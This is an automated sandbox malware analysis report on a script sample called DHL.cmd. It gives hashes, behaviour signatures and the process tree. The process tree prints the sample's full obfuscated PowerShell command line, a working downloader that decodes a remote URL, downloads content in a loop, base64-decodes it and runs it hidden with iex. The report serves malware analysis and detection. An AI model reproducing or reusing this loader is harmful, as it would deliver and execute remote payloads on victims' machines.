Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
12-07-2024 09:34
Static task
static1
Behavioral task
behavioral1
Sample
DHL.cmd
Resource
win7-20240704-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
DHL.cmd
Resource
win10v2004-20240709-en
18 signatures
150 seconds
General
-
Target
DHL.cmd
-
Size
6KB
-
MD5
4fac338e225a33e53806bf2f27f3ed0e
-
SHA1
5e7f1620ebe0099e2c7014b2e725eefbdaecab85
-
SHA256
1825ea48164cc22c0872fea1d7ed7698d8ac439c8404207db2234cdc2b95f1ba
-
SHA512
cdeee8abcf1153740d8d1c0cc82c23c2f4b71fb6335b4fa1c3c5bf4838a0186f8043b3b5223c8d13c62c777be7cb8df2ef12a617485cdf61c527e2d5f5888844
-
SSDEEP
192:YWFEaVQEQKcwglcCy6XnU/pTmAaelT2dvmf:ThuZXGCyWU/praeIdvW
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 58 IoCs
Processes:
powershell.exeflow pid process 3 2496 powershell.exe 4 2496 powershell.exe 5 2496 powershell.exe 6 2496 powershell.exe 7 2496 powershell.exe 8 2496 powershell.exe 9 2496 powershell.exe 10 2496 powershell.exe 11 2496 powershell.exe 12 2496 powershell.exe 13 2496 powershell.exe 14 2496 powershell.exe 15 2496 powershell.exe 16 2496 powershell.exe 17 2496 powershell.exe 18 2496 powershell.exe 19 2496 powershell.exe 20 2496 powershell.exe 21 2496 powershell.exe 22 2496 powershell.exe 23 2496 powershell.exe 24 2496 powershell.exe 25 2496 powershell.exe 26 2496 powershell.exe 27 2496 powershell.exe 28 2496 powershell.exe 29 2496 powershell.exe 30 2496 powershell.exe 31 2496 powershell.exe 32 2496 powershell.exe 33 2496 powershell.exe 34 2496 powershell.exe 35 2496 powershell.exe 36 2496 powershell.exe 37 2496 powershell.exe 38 2496 powershell.exe 39 2496 powershell.exe 40 2496 powershell.exe 41 2496 powershell.exe 42 2496 powershell.exe 43 2496 powershell.exe 44 2496 powershell.exe 45 2496 powershell.exe 46 2496 powershell.exe 47 2496 powershell.exe 48 2496 powershell.exe 49 2496 powershell.exe 50 2496 powershell.exe 51 2496 powershell.exe 52 2496 powershell.exe 53 2496 powershell.exe 54 2496 powershell.exe 55 2496 powershell.exe 56 2496 powershell.exe 57 2496 powershell.exe 58 2496 powershell.exe 59 2496 powershell.exe 60 2496 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2496 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2496 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 3056 wrote to memory of 2496 3056 cmd.exe powershell.exe PID 3056 wrote to memory of 2496 3056 cmd.exe powershell.exe PID 3056 wrote to memory of 2496 3056 cmd.exe powershell.exe PID 2496 wrote to memory of 2756 2496 powershell.exe cmd.exe PID 2496 wrote to memory of 2756 2496 powershell.exe cmd.exe PID 2496 wrote to memory of 2756 2496 powershell.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"3⤵PID:2756